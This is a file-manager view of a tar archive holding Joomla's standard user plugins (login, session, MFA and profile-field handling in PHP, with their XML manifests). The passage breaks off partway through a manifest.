File manager - Edit - /home/opticamezl/www/newok/user.tar
Back
joomla/index.html 0000604 00000000037 15166416310 0010021 0 ustar 00 <!DOCTYPE html><title></title> joomla/joomla.xml 0000644 00000003305 15166416310 0010034 0 ustar 00 <?xml version="1.0" encoding="UTF-8"?> <extension type="plugin" group="user" method="upgrade"> <name>plg_user_joomla</name> <author>Joomla! Project</author> <creationDate>2006-12</creationDate> <copyright>(C) 2006 Open Source Matters, Inc.</copyright> <license>GNU General Public License version 2 or later; see LICENSE.txt</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>3.0.0</version> <description>PLG_USER_JOOMLA_XML_DESCRIPTION</description> <namespace path="src">Joomla\Plugin\User\Joomla</namespace> <files> <folder plugin="joomla">services</folder> <folder>src</folder> </files> <languages> <language tag="en-GB">language/en-GB/plg_user_joomla.ini</language> <language tag="en-GB">language/en-GB/plg_user_joomla.sys.ini</language> </languages> <config> <fields name="params"> <fieldset name="basic"> <field name="autoregister" type="radio" layout="joomla.form.field.radio.switcher" label="PLG_USER_JOOMLA_FIELD_AUTOREGISTER_LABEL" default="1" > <option value="0">JNO</option> <option value="1">JYES</option> </field> <field name="mail_to_user" type="radio" layout="joomla.form.field.radio.switcher" label="PLG_USER_JOOMLA_FIELD_MAILTOUSER_LABEL" default="1" > <option value="0">JNO</option> <option value="1">JYES</option> </field> <field name="forceLogout" type="radio" layout="joomla.form.field.radio.switcher" label="PLG_USER_JOOMLA_FIELD_FORCELOGOUT_LABEL" default="1" > <option value="0">JNO</option> <option value="1">JYES</option> </field> </fieldset> </fields> </config> </extension> joomla/src/Extension/Joomla.php 0000644 00000041667 15166416310 0012543 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage User.joomla * * @copyright (C) 2006 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\Plugin\User\Joomla\Extension; use Joomla\CMS\Component\ComponentHelper; use Joomla\CMS\Factory; use Joomla\CMS\Language\LanguageFactoryInterface; use Joomla\CMS\Log\Log; use Joomla\CMS\Mail\MailTemplate; use Joomla\CMS\Plugin\CMSPlugin; use Joomla\CMS\Uri\Uri; use Joomla\CMS\User\User; use Joomla\CMS\User\UserHelper; use Joomla\Database\DatabaseAwareTrait; use Joomla\Database\Exception\ExecutionFailureException; use Joomla\Database\ParameterType; use Joomla\Registry\Registry; // phpcs:disable PSR1.Files.SideEffects \defined('_JEXEC') or die; // phpcs:enable PSR1.Files.SideEffects /** * Joomla User plugin * * @since 1.5 */ final class Joomla extends CMSPlugin { use DatabaseAwareTrait; /** * Set as required the passwords fields when mail to user is set to No * * @param \Joomla\CMS\Form\Form $form The form to be altered. * @param mixed $data The associated data for the form. * * @return boolean * * @since 4.0.0 */ public function onContentPrepareForm($form, $data) { // Check we are manipulating a valid user form before modifying it. $name = $form->getName(); if ($name === 'com_users.user') { // In case there is a validation error (like duplicated user), $data is an empty array on save. // After returning from error, $data is an array but populated if (!$data) { $data = $this->getApplication()->getInput()->get('jform', [], 'array'); } if (is_array($data)) { $data = (object) $data; } // Passwords fields are required when mail to user is set to No if (empty($data->id) && !$this->params->get('mail_to_user', 1)) { $form->setFieldAttribute('password', 'required', 'true'); $form->setFieldAttribute('password2', 'required', 'true'); } } return true; } /** * Remove all sessions for the user name * * Method is called after user data is deleted from the database * * @param array $user Holds the user data * @param boolean $success True if user was successfully stored in the database * @param string $msg Message * * @return void * * @since 1.6 */ public function onUserAfterDelete($user, $success, $msg): void { if (!$success) { return; } $userId = (int) $user['id']; // Only execute this if the session metadata is tracked if ($this->getApplication()->get('session_metadata', true)) { UserHelper::destroyUserSessions($userId, true); } $db = $this->getDatabase(); try { $db->setQuery( $db->getQuery(true) ->delete($db->quoteName('#__messages')) ->where($db->quoteName('user_id_from') . ' = :userId') ->bind(':userId', $userId, ParameterType::INTEGER) )->execute(); } catch (ExecutionFailureException $e) { // Do nothing. } // Delete Multi-factor Authentication user profile records $profileKey = 'mfa.%'; $query = $db->getQuery(true) ->delete($db->quoteName('#__user_profiles')) ->where($db->quoteName('user_id') . ' = :userId') ->where($db->quoteName('profile_key') . ' LIKE :profileKey') ->bind(':userId', $userId, ParameterType::INTEGER) ->bind(':profileKey', $profileKey, ParameterType::STRING); try { $db->setQuery($query)->execute(); } catch (\Exception $e) { // Do nothing } // Delete Multi-factor Authentication records $query = $db->getQuery(true) ->delete($db->quoteName('#__user_mfa')) ->where($db->quoteName('user_id') . ' = :userId') ->bind(':userId', $userId, ParameterType::INTEGER); try { $db->setQuery($query)->execute(); } catch (\Exception $e) { // Do nothing } } /** * Utility method to act on a user after it has been saved. * * This method sends a registration email to new users created in the backend. * * @param array $user Holds the new user data. * @param boolean $isnew True if a new user is stored. * @param boolean $success True if user was successfully stored in the database. * @param string $msg Message. * * @return void * * @since 1.6 */ public function onUserAfterSave($user, $isnew, $success, $msg): void { $mail_to_user = $this->params->get('mail_to_user', 1); if (!$isnew || !$mail_to_user) { return; } $app = $this->getApplication(); $language = $app->getLanguage(); $defaultLocale = $language->getTag(); // @todo: Suck in the frontend registration emails here as well. Job for a rainy day. // The method check here ensures that if running as a CLI Application we don't get any errors if (method_exists($app, 'isClient') && ($app->isClient('site') || $app->isClient('cli'))) { return; } // Check if we have a sensible from email address, if not bail out as mail would not be sent anyway if (strpos($app->get('mailfrom'), '@') === false) { $app->enqueueMessage($language->_('JERROR_SENDING_EMAIL'), 'warning'); return; } /** * Look for user language. Priority: * 1. User frontend language * 2. User backend language */ $userParams = new Registry($user['params']); $userLocale = $userParams->get('language', $userParams->get('admin_language', $defaultLocale)); // Temporarily set application language to user's language. if ($userLocale !== $defaultLocale) { Factory::$language = Factory::getContainer() ->get(LanguageFactoryInterface::class) ->createLanguage($userLocale, $app->get('debug_lang', false)); if (method_exists($app, 'loadLanguage')) { $app->loadLanguage(Factory::$language); } } // Load plugin language files. $this->loadLanguage(); // Collect data for mail $data = [ 'name' => $user['name'], 'sitename' => $app->get('sitename'), 'url' => Uri::root(), 'username' => $user['username'], 'password' => $user['password_clear'], 'email' => $user['email'], ]; $mailer = new MailTemplate('plg_user_joomla.mail', $userLocale); $mailer->addTemplateData($data); $mailer->addUnsafeTags(['username', 'password', 'name', 'email']); $mailer->addRecipient($user['email'], $user['name']); try { $res = $mailer->send(); } catch (\Exception $exception) { try { Log::add($language->_($exception->getMessage()), Log::WARNING, 'jerror'); $res = false; } catch (\RuntimeException $exception) { $app->enqueueMessage($language->_($exception->getMessage()), 'warning'); $res = false; } } if ($res === false) { $app->enqueueMessage($language->_('JERROR_SENDING_EMAIL'), 'warning'); } // Set application language back to default if we changed it if ($userLocale !== $defaultLocale) { Factory::$language = $language; if (method_exists($app, 'loadLanguage')) { $app->loadLanguage($language); } } } /** * This method should handle any login logic and report back to the subject * * @param array $user Holds the user data * @param array $options Array holding options (remember, autoregister, group) * * @return boolean True on success * * @since 1.5 */ public function onUserLogin($user, $options = []) { $instance = $this->getUser($user, $options); // If getUser returned an error, then pass it back. if ($instance instanceof \Exception) { return false; } // If the user is blocked, redirect with an error if ($instance->block == 1) { $this->getApplication()->enqueueMessage($this->getApplication()->getLanguage()->_('JERROR_NOLOGIN_BLOCKED'), 'warning'); return false; } // Authorise the user based on the group information if (!isset($options['group'])) { $options['group'] = 'USERS'; } // Check the user can login. $result = $instance->authorise($options['action']); if (!$result) { $this->getApplication()->enqueueMessage($this->getApplication()->getLanguage()->_('JERROR_LOGIN_DENIED'), 'warning'); return false; } // Mark the user as logged in $instance->guest = 0; // Load the logged in user to the application $this->getApplication()->loadIdentity($instance); $session = $this->getApplication()->getSession(); // Grab the current session ID $oldSessionId = $session->getId(); // Fork the session $session->fork(); // Register the needed session variables $session->set('user', $instance); // Update the user related fields for the Joomla sessions table if tracking session metadata. if ($this->getApplication()->get('session_metadata', true)) { $this->getApplication()->checkSession(); } $db = $this->getDatabase(); // Purge the old session $query = $db->getQuery(true) ->delete($db->quoteName('#__session')) ->where($db->quoteName('session_id') . ' = :sessionid') ->bind(':sessionid', $oldSessionId); try { $db->setQuery($query)->execute(); } catch (\RuntimeException $e) { // The old session is already invalidated, don't let this block logging in } // Hit the user last visit field $instance->setLastVisit(); // Add "user state" cookie used for reverse caching proxies like Varnish, Nginx etc. if ($this->getApplication()->isClient('site')) { $this->getApplication()->getInput()->cookie->set( 'joomla_user_state', 'logged_in', 0, $this->getApplication()->get('cookie_path', '/'), $this->getApplication()->get('cookie_domain', ''), $this->getApplication()->isHttpsForced(), true ); } return true; } /** * This method should handle any logout logic and report back to the subject * * @param array $user Holds the user data. * @param array $options Array holding options (client, ...). * * @return boolean True on success * * @since 1.5 */ public function onUserLogout($user, $options = []) { $my = Factory::getUser(); $session = Factory::getSession(); $userid = (int) $user['id']; // Make sure we're a valid user first if ($user['id'] === 0 && !$my->get('tmp_user')) { return true; } $sharedSessions = $this->getApplication()->get('shared_session', '0'); // Check to see if we're deleting the current session if ($my->id == $userid && ($sharedSessions || (!$sharedSessions && $options['clientid'] == $this->getApplication()->getClientId()))) { // Hit the user last visit field $my->setLastVisit(); // Destroy the php session for this user $session->destroy(); } // Enable / Disable Forcing logout all users with same userid, but only if session metadata is tracked $forceLogout = $this->params->get('forceLogout', 1) && $this->getApplication()->get('session_metadata', true); if ($forceLogout) { $clientId = $sharedSessions ? null : (int) $options['clientid']; UserHelper::destroyUserSessions($user['id'], false, $clientId); } // Delete "user state" cookie used for reverse caching proxies like Varnish, Nginx etc. if ($this->getApplication()->isClient('site')) { $this->getApplication()->getInput()->cookie->set('joomla_user_state', '', 1, $this->getApplication()->get('cookie_path', '/'), $this->getApplication()->get('cookie_domain', '')); } return true; } /** * Hooks on the Joomla! login event. Detects silent logins and disables the Multi-Factor * Authentication page in this case. * * Moreover, it will save the redirection URL and the Captive URL which is necessary in Joomla 4. You see, in Joomla * 4 having unified sessions turned on makes the backend login redirect you to the frontend of the site AFTER * logging in, something which would cause the Captive page to appear in the frontend and redirect you to the public * frontend homepage after successfully passing the Two Step verification process. * * @param array $options Passed by Joomla. user: a User object; responseType: string, authentication response type. * * @return void * @since 4.2.0 */ public function onUserAfterLogin(array $options): void { if (!($this->getApplication()->isClient('administrator')) && !($this->getApplication()->isClient('site'))) { return; } $this->disableMfaOnSilentLogin($options); } /** * Detect silent logins and disable MFA if the relevant com_users option is set. * * @param array $options The array of login options and login result * * @return void * @since 4.2.0 */ private function disableMfaOnSilentLogin(array $options): void { $userParams = ComponentHelper::getParams('com_users'); $doMfaOnSilentLogin = $userParams->get('mfaonsilent', 0) == 1; // Should I show MFA even on silent logins? Default: 1 (yes, show) if ($doMfaOnSilentLogin) { return; } // Make sure I have a valid user /** @var User $user */ $user = $options['user']; if (!is_object($user) || !($user instanceof User) || $user->guest) { return; } $silentResponseTypes = array_map( 'trim', explode(',', $userParams->get('silentresponses', '') ?: '') ); $silentResponseTypes = $silentResponseTypes ?: ['cookie', 'passwordless']; // Only proceed if this is not a silent login if (!in_array(strtolower($options['responseType'] ?? ''), $silentResponseTypes)) { return; } // Set the flag indicating that MFA is already checked. $this->getApplication()->getSession()->set('com_users.mfa_checked', 1); } /** * This method will return a user object * * If options['autoregister'] is true, if the user doesn't exist yet they will be created * * @param array $user Holds the user data. * @param array $options Array holding options (remember, autoregister, group). * * @return User * * @since 1.5 */ private function getUser($user, $options = []) { $instance = User::getInstance(); $id = (int) UserHelper::getUserId($user['username']); if ($id) { $instance->load($id); return $instance; } // @todo : move this out of the plugin $params = ComponentHelper::getParams('com_users'); // Read the default user group option from com_users $defaultUserGroup = $params->get('new_usertype', $params->get('guest_usergroup', 1)); $instance->id = 0; $instance->name = $user['fullname']; $instance->username = $user['username']; $instance->password_clear = $user['password_clear']; // Result should contain an email (check). $instance->email = $user['email']; $instance->groups = [$defaultUserGroup]; // If autoregister is set let's register the user $autoregister = $options['autoregister'] ?? $this->params->get('autoregister', 1); if ($autoregister) { if (!$instance->save()) { Log::add('Failed to automatically create account for user ' . $user['username'] . '.', Log::WARNING, 'error'); } } else { // No existing user and autoregister off, this is a temporary user. $instance->set('tmp_user', true); } return $instance; } } joomla/services/provider.php 0000644 00000002627 15166416310 0012225 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage User.joomla * * @copyright (C) 2023 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; use Joomla\CMS\Extension\PluginInterface; use Joomla\CMS\Factory; use Joomla\CMS\Plugin\PluginHelper; use Joomla\Database\DatabaseInterface; use Joomla\DI\Container; use Joomla\DI\ServiceProviderInterface; use Joomla\Event\DispatcherInterface; use Joomla\Plugin\User\Joomla\Extension\Joomla; return new class () implements ServiceProviderInterface { /** * Registers the service provider with a DI container. * * @param Container $container The DI container. * * @return void * * @since 4.4.0 */ public function register(Container $container): void { $container->set( PluginInterface::class, function (Container $container) { $dispatcher = $container->get(DispatcherInterface::class); $plugin = new Joomla( $dispatcher, (array) PluginHelper::getPlugin('user', 'joomla') ); $plugin->setApplication(Factory::getApplication()); $plugin->setDatabase($container->get(DatabaseInterface::class)); return $plugin; } ); } }; index.html 0000604 00000000037 15166416310 0006540 0 ustar 00 <!DOCTYPE html><title></title> profile/forms/profile.xml 0000644 00000004101 15166416310 0011513 0 ustar 00 <?xml version="1.0" encoding="UTF-8"?> <form> <fields name="profile"> <fieldset name="profile" label="PLG_USER_PROFILE_SLIDER_LABEL" > <field name="address1" type="text" label="PLG_USER_PROFILE_FIELD_ADDRESS1_LABEL" filter="string" size="30" /> <field name="address2" type="text" label="PLG_USER_PROFILE_FIELD_ADDRESS2_LABEL" filter="string" size="30" /> <field name="city" type="text" label="PLG_USER_PROFILE_FIELD_CITY_LABEL" filter="string" size="30" /> <field name="region" type="text" label="PLG_USER_PROFILE_FIELD_REGION_LABEL" filter="string" size="30" /> <field name="country" type="text" label="PLG_USER_PROFILE_FIELD_COUNTRY_LABEL" filter="string" size="30" /> <field name="postal_code" type="text" label="PLG_USER_PROFILE_FIELD_POSTAL_CODE_LABEL" filter="string" size="30" /> <field name="phone" type="tel" label="PLG_USER_PROFILE_FIELD_PHONE_LABEL" filter="string" size="30" /> <field name="website" type="url" label="PLG_USER_PROFILE_FIELD_WEB_SITE_LABEL" filter="url" size="30" validate="url" /> <field name="favoritebook" type="text" label="PLG_USER_PROFILE_FIELD_FAVORITE_BOOK_LABEL" filter="string" size="30" /> <field name="aboutme" type="textarea" label="PLG_USER_PROFILE_FIELD_ABOUT_ME_LABEL" cols="30" rows="5" filter="safehtml" /> <field name="dob" type="calendar" label="PLG_USER_PROFILE_FIELD_DOB_LABEL" description="PLG_USER_PROFILE_FIELD_DOB_DESCRIPTION" hint="PLG_USER_PROFILE_FIELD_DOB_HINT" translateformat="true" showtime="false" filter="server_utc" /> <field name="tos" type="tos" label="PLG_USER_PROFILE_FIELD_TOS_LABEL" default="0" filter="integer" > <option value="1">PLG_USER_PROFILE_OPTION_AGREE</option> <option value="0">PLG_USER_PROFILE_OPTION_DO_NOT_AGREE</option> </field> </fieldset> </fields> </form> profile/src/Field/TosField.php 0000644 00000011755 15166416311 0012255 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage User.profile * * @copyright (C) 2012 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\Plugin\User\Profile\Field; use Joomla\CMS\Factory; use Joomla\CMS\Form\Field\RadioField; use Joomla\CMS\HTML\HTMLHelper; use Joomla\CMS\Language\Associations; use Joomla\CMS\Language\Text; use Joomla\CMS\Router\Route; use Joomla\Component\Content\Site\Helper\RouteHelper; use Joomla\Database\ParameterType; // phpcs:disable PSR1.Files.SideEffects \defined('_JEXEC') or die; // phpcs:enable PSR1.Files.SideEffects /** * Provides input for TOS * * @since 2.5.5 */ class TosField extends RadioField { /** * The form field type. * * @var string * @since 2.5.5 */ protected $type = 'Tos'; /** * Method to get the field label markup. * * @return string The field label markup. * * @since 2.5.5 */ protected function getLabel() { $label = ''; if ($this->hidden) { return $label; } // Get the label text from the XML element, defaulting to the element name. $text = $this->element['label'] ? (string) $this->element['label'] : (string) $this->element['name']; $text = $this->translateLabel ? Text::_($text) : $text; // Set required to true as this field is not displayed at all if not required. $this->required = true; // Build the class for the label. $class = !empty($this->description) ? 'hasPopover' : ''; $class = $class . ' required'; $class = !empty($this->labelClass) ? $class . ' ' . $this->labelClass : $class; // Add the opening label tag and main attributes attributes. $label .= '<label id="' . $this->id . '-lbl" for="' . $this->id . '" class="' . $class . '"'; // If a description is specified, use it to build a tooltip. if (!empty($this->description)) { HTMLHelper::_('bootstrap.popover', '.hasPopover'); $label .= ' data-bs-content="' . htmlspecialchars( $this->translateDescription ? Text::_($this->description) : $this->description, ENT_COMPAT, 'UTF-8' ) . '"'; if (Factory::getLanguage()->isRtl()) { $label .= ' data-bs-placement="left"'; } } $tosArticle = $this->element['article'] > 0 ? (int) $this->element['article'] : 0; if ($tosArticle) { $attribs = []; $attribs['data-bs-toggle'] = 'modal'; $attribs['data-bs-target'] = '#tosModal'; $db = $this->getDatabase(); $query = $db->getQuery(true); $query->select($db->quoteName(['id', 'alias', 'catid', 'language'])) ->from($db->quoteName('#__content')) ->where($db->quoteName('id') . ' = :id') ->bind(':id', $tosArticle, ParameterType::INTEGER); $db->setQuery($query); $article = $db->loadObject(); if (Associations::isEnabled()) { $tosAssociated = Associations::getAssociations('com_content', '#__content', 'com_content.item', $tosArticle); } $currentLang = Factory::getLanguage()->getTag(); if (isset($tosAssociated) && $currentLang !== $article->language && \array_key_exists($currentLang, $tosAssociated)) { $url = RouteHelper::getArticleRoute( $tosAssociated[$currentLang]->id, $tosAssociated[$currentLang]->catid, $tosAssociated[$currentLang]->language ); $link = HTMLHelper::_('link', Route::_($url . '&tmpl=component'), $text, $attribs); } else { $slug = $article->alias ? ($article->id . ':' . $article->alias) : $article->id; $url = RouteHelper::getArticleRoute($slug, $article->catid, $article->language); $link = HTMLHelper::_('link', Route::_($url . '&tmpl=component'), $text, $attribs); } echo HTMLHelper::_( 'bootstrap.renderModal', 'tosModal', [ 'url' => Route::_($url . '&tmpl=component'), 'title' => $text, 'height' => '100%', 'width' => '100%', 'modalWidth' => '800', 'bodyHeight' => '500', 'footer' => '<button type="button" class="btn btn-secondary" data-bs-dismiss="modal" aria-hidden="true">' . Text::_('JLIB_HTML_BEHAVIOR_CLOSE') . '</button>', ] ); } else { $link = $text; } // Add the label text and closing tag. $label .= '>' . $link . '<span class="star" aria-hidden="true"> *</span></label>'; return $label; } } profile/src/Extension/Profile.php 0000644 00000034732 15166416311 0013075 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage User.profile * * @copyright (C) 2009 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\Plugin\User\Profile\Extension; use Exception; use Joomla\CMS\Date\Date; use Joomla\CMS\Form\Form; use Joomla\CMS\Form\FormHelper; use Joomla\CMS\HTML\HTMLHelper; use Joomla\CMS\Language\Text; use Joomla\CMS\Plugin\CMSPlugin; use Joomla\CMS\String\PunycodeHelper; use Joomla\Database\DatabaseAwareTrait; use Joomla\Database\ParameterType; use Joomla\Utilities\ArrayHelper; // phpcs:disable PSR1.Files.SideEffects \defined('_JEXEC') or die; // phpcs:enable PSR1.Files.SideEffects /** * An example custom profile plugin. * * @since 1.6 */ final class Profile extends CMSPlugin { use DatabaseAwareTrait; /** * Load the language file on instantiation. * * @var boolean * * @since 3.1 */ protected $autoloadLanguage = true; /** * Date of birth. * * @var string * * @since 3.1 */ private $date = ''; /** * Runs on content preparation * * @param string $context The context for the data * @param object $data An object containing the data for the form. * * @return boolean * * @since 1.6 */ public function onContentPrepareData($context, $data) { // Check we are manipulating a valid form. if (!in_array($context, ['com_users.profile', 'com_users.user', 'com_users.registration'])) { return true; } if (is_object($data)) { $userId = $data->id ?? 0; if (!isset($data->profile) && $userId > 0) { // Load the profile data from the database. $db = $this->getDatabase(); $query = $db->getQuery(true) ->select( [ $db->quoteName('profile_key'), $db->quoteName('profile_value'), ] ) ->from($db->quoteName('#__user_profiles')) ->where($db->quoteName('user_id') . ' = :userid') ->where($db->quoteName('profile_key') . ' LIKE ' . $db->quote('profile.%')) ->order($db->quoteName('ordering')) ->bind(':userid', $userId, ParameterType::INTEGER); $db->setQuery($query); $results = $db->loadRowList(); // Merge the profile data. $data->profile = []; foreach ($results as $v) { $k = str_replace('profile.', '', $v[0]); $data->profile[$k] = json_decode($v[1], true); if ($data->profile[$k] === null) { $data->profile[$k] = $v[1]; } } } if (!HTMLHelper::isRegistered('users.url')) { HTMLHelper::register('users.url', [__CLASS__, 'url']); } if (!HTMLHelper::isRegistered('users.calendar')) { HTMLHelper::register('users.calendar', [__CLASS__, 'calendar']); } if (!HTMLHelper::isRegistered('users.tos')) { HTMLHelper::register('users.tos', [__CLASS__, 'tos']); } if (!HTMLHelper::isRegistered('users.dob')) { HTMLHelper::register('users.dob', [__CLASS__, 'dob']); } } return true; } /** * Returns an anchor tag generated from a given value * * @param string $value URL to use * * @return mixed|string */ public static function url($value) { if (empty($value)) { return HTMLHelper::_('users.value', $value); } else { // Convert website URL to utf8 for display $value = htmlspecialchars(PunycodeHelper::urlToUTF8($value), ENT_QUOTES, 'UTF-8'); if (strpos($value, 'http') === 0) { return '<a href="' . $value . '">' . $value . '</a>'; } else { return '<a href="http://' . $value . '">' . $value . '</a>'; } } } /** * Returns html markup showing a date picker * * @param string $value valid date string * * @return mixed */ public static function calendar($value) { if (empty($value)) { return HTMLHelper::_('users.value', $value); } else { return HTMLHelper::_('date', $value, null, null); } } /** * Returns the date of birth formatted and calculated using server timezone. * * @param string $value valid date string * * @return mixed */ public static function dob($value) { if (!$value) { return ''; } return HTMLHelper::_('date', $value, Text::_('DATE_FORMAT_LC1'), false); } /** * Return the translated strings yes or no depending on the value * * @param boolean $value input value * * @return string */ public static function tos($value) { if ($value) { return Text::_('JYES'); } else { return Text::_('JNO'); } } /** * Adds additional fields to the user editing form * * @param Form $form The form to be altered. * @param mixed $data The associated data for the form. * * @return boolean * * @since 1.6 */ public function onContentPrepareForm(Form $form, $data) { // Check we are manipulating a valid form. $name = $form->getName(); if (!in_array($name, ['com_users.user', 'com_users.profile', 'com_users.registration'])) { return true; } // Add the registration fields to the form. FormHelper::addFieldPrefix('Joomla\\Plugin\\User\\Profile\\Field'); FormHelper::addFormPath(JPATH_PLUGINS . '/' . $this->_type . '/' . $this->_name . '/forms'); $form->loadFile('profile'); $fields = [ 'address1', 'address2', 'city', 'region', 'country', 'postal_code', 'phone', 'website', 'favoritebook', 'aboutme', 'dob', 'tos', ]; $tosArticle = $this->params->get('register_tos_article'); $tosEnabled = $this->params->get('register-require_tos', 0); // We need to be in the registration form and field needs to be enabled if ($name !== 'com_users.registration' || !$tosEnabled) { // We only want the TOS in the registration form $form->removeField('tos', 'profile'); } else { // Push the TOS article ID into the TOS field. $form->setFieldAttribute('tos', 'article', $tosArticle, 'profile'); } foreach ($fields as $field) { // Case using the users manager in admin if ($name === 'com_users.user') { // Toggle whether the field is required. if ($this->params->get('profile-require_' . $field, 1) > 0) { $form->setFieldAttribute($field, 'required', ($this->params->get('profile-require_' . $field) == 2) ? 'required' : '', 'profile'); } elseif ( // Remove the field if it is disabled in registration and profile $this->params->get('register-require_' . $field, 1) == 0 && $this->params->get('profile-require_' . $field, 1) == 0 ) { $form->removeField($field, 'profile'); } } elseif ($name === 'com_users.registration') { // Case registration // Toggle whether the field is required. if ($this->params->get('register-require_' . $field, 1) > 0) { $form->setFieldAttribute($field, 'required', ($this->params->get('register-require_' . $field) == 2) ? 'required' : '', 'profile'); } else { $form->removeField($field, 'profile'); } } elseif ($name === 'com_users.profile') { // Case profile in site or admin // Toggle whether the field is required. if ($this->params->get('profile-require_' . $field, 1) > 0) { $form->setFieldAttribute($field, 'required', ($this->params->get('profile-require_' . $field) == 2) ? 'required' : '', 'profile'); } else { $form->removeField($field, 'profile'); } } } // Drop the profile form entirely if there aren't any fields to display. $remainingfields = $form->getGroup('profile'); if (!count($remainingfields)) { $form->removeGroup('profile'); } return true; } /** * Method is called before user data is stored in the database * * @param array $user Holds the old user data. * @param boolean $isnew True if a new user is stored. * @param array $data Holds the new user data. * * @return boolean * * @since 3.1 * @throws \InvalidArgumentException on invalid date. */ public function onUserBeforeSave($user, $isnew, $data) { // Check that the date is valid. if (!empty($data['profile']['dob'])) { try { $date = new Date($data['profile']['dob']); $this->date = $date->format('Y-m-d H:i:s'); } catch (\Exception $e) { // Throw an exception if date is not valid. throw new \InvalidArgumentException($this->getApplication()->getLanguage()->_('PLG_USER_PROFILE_ERROR_INVALID_DOB')); } if (Date::getInstance('now') < $date) { // Throw an exception if dob is greater than now. throw new \InvalidArgumentException($this->getApplication()->getLanguage()->_('PLG_USER_PROFILE_ERROR_INVALID_DOB_FUTURE_DATE')); } } // Check that the tos is checked if required ie only in registration from frontend. $task = $this->getApplication()->getInput()->getCmd('task'); $option = $this->getApplication()->getInput()->getCmd('option'); $tosEnabled = ($this->params->get('register-require_tos', 0) == 2); // Check that the tos is checked. if ($task === 'register' && $tosEnabled && $option === 'com_users' && !$data['profile']['tos']) { throw new \InvalidArgumentException($this->getApplication()->getLanguage()->_('PLG_USER_PROFILE_FIELD_TOS_DESC_SITE')); } return true; } /** * Saves user profile data * * @param array $data entered user data * @param boolean $isNew true if this is a new user * @param boolean $result true if saving the user worked * @param string $error error message * * @return void */ public function onUserAfterSave($data, $isNew, $result, $error): void { $userId = ArrayHelper::getValue($data, 'id', 0, 'int'); if ($userId && $result && isset($data['profile']) && count($data['profile'])) { $db = $this->getDatabase(); // Sanitize the date if (!empty($data['profile']['dob'])) { $data['profile']['dob'] = $this->date; } $keys = array_keys($data['profile']); foreach ($keys as &$key) { $key = 'profile.' . $key; } $query = $db->getQuery(true) ->delete($db->quoteName('#__user_profiles')) ->where($db->quoteName('user_id') . ' = :userid') ->whereIn($db->quoteName('profile_key'), $keys, ParameterType::STRING) ->bind(':userid', $userId, ParameterType::INTEGER); $db->setQuery($query); $db->execute(); $query->clear() ->select($db->quoteName('ordering')) ->from($db->quoteName('#__user_profiles')) ->where($db->quoteName('user_id') . ' = :userid') ->bind(':userid', $userId, ParameterType::INTEGER); $db->setQuery($query); $usedOrdering = $db->loadColumn(); $order = 1; $query->clear() ->insert($db->quoteName('#__user_profiles')); foreach ($data['profile'] as $k => $v) { while (in_array($order, $usedOrdering)) { $order++; } $query->values( implode( ',', $query->bindArray( [ $userId, 'profile.' . $k, json_encode($v), $order++, ], [ ParameterType::INTEGER, ParameterType::STRING, ParameterType::STRING, ParameterType::INTEGER, ] ) ) ); } $db->setQuery($query); $db->execute(); } } /** * Remove all user profile information for the given user ID * * Method is called after user data is deleted from the database * * @param array $user Holds the user data * @param boolean $success True if user was successfully stored in the database * @param string $msg Message * * @return void */ public function onUserAfterDelete($user, $success, $msg): void { if (!$success) { return; } $userId = ArrayHelper::getValue($user, 'id', 0, 'int'); if ($userId) { $db = $this->getDatabase(); $query = $db->getQuery(true) ->delete($db->quoteName('#__user_profiles')) ->where($db->quoteName('user_id') . ' = :userid') ->where($db->quoteName('profile_key') . ' LIKE ' . $db->quote('profile.%')) ->bind(':userid', $userId, ParameterType::INTEGER); $db->setQuery($query); $db->execute(); } } } profile/profile.xml 0000644 00000022234 15166416311 0010375 0 ustar 00 <?xml version="1.0" encoding="UTF-8"?> <extension type="plugin" group="user" method="upgrade"> <name>plg_user_profile</name> <author>Joomla! Project</author> <creationDate>2008-01</creationDate> <copyright>(C) 2008 Open Source Matters, Inc.</copyright> <license>GNU General Public License version 2 or later; see LICENSE.txt</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>3.0.0</version> <description>PLG_USER_PROFILE_XML_DESCRIPTION</description> <namespace path="src">Joomla\Plugin\User\Profile</namespace> <files> <folder>forms</folder> <folder plugin="profile">services</folder> <folder>src</folder> </files> <languages> <language tag="en-GB">language/en-GB/plg_user_profile.ini</language> <language tag="en-GB">language/en-GB/plg_user_profile.sys.ini</language> </languages> <config> <fields name="params"> <fieldset name="basic" addfieldprefix="Joomla\Component\Content\Administrator\Field"> <field name="register-require-user" type="spacer" label="PLG_USER_PROFILE_FIELD_NAME_REGISTER_REQUIRE_USER" class="text" /> <field name="register-require_address1" type="list" label="PLG_USER_PROFILE_FIELD_ADDRESS1_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_address2" type="list" label="PLG_USER_PROFILE_FIELD_ADDRESS2_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_city" type="list" label="PLG_USER_PROFILE_FIELD_CITY_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_region" type="list" label="PLG_USER_PROFILE_FIELD_REGION_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_country" type="list" label="PLG_USER_PROFILE_FIELD_COUNTRY_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_postal_code" type="list" 